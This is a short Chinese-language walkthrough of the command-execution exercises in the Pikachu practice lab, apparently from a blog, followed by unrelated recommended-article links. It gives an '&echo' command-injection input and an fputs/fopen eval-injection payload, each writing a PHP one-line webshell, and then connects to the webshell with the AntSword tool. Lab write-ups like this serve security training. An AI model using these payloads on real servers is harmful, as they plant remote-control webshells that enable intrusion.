Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POSTcmd);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST"cmd")?>');

3.蚁剑连接

相关推荐
天空之城--1 小时前
Android逆向安全合规接单指南
android·安全
蓝速科技3 小时前
医院导诊 AI 数字人一体机场景适配与落地指南丨蓝速科技
运维·数据库·人工智能·科技·自然语言处理·技术分享
H_oRIZoN_3 小时前
Linux入门DAY41(51 单片机 串口与通信协议)
linux·运维·单片机
是隼人4 小时前
buuctf-pwn picoctf_2018_shellcode(ret2shellcode)题解(学习过程持续更新)
c语言·学习·安全·pwn入门·ctf入门
小马同学-5 小时前
OpenStack 使用实战:Web 界面与 CLI 命令行实验
运维·云计算·openstack
hasty5 小时前
_proto__ 不是普通键:从 JSON 反序列化看原型污染
安全·json
Wang's Blog5 小时前
Java框架快速入门: Spring Security+OAuth2之方法级安全注解
java·安全·spring
网安老伯6 小时前
都2026年了,还在问网络安全怎么入门?看完这一篇你就懂了
运维·计算机网络·web安全·网络安全·wireshark·密码学·网络攻击模型
小祺先生6 小时前
mt7921 debian系统 如何安装驱动
运维·网络·debian
m0_459872926 小时前
Linux 系统基础
linux·运维·服务器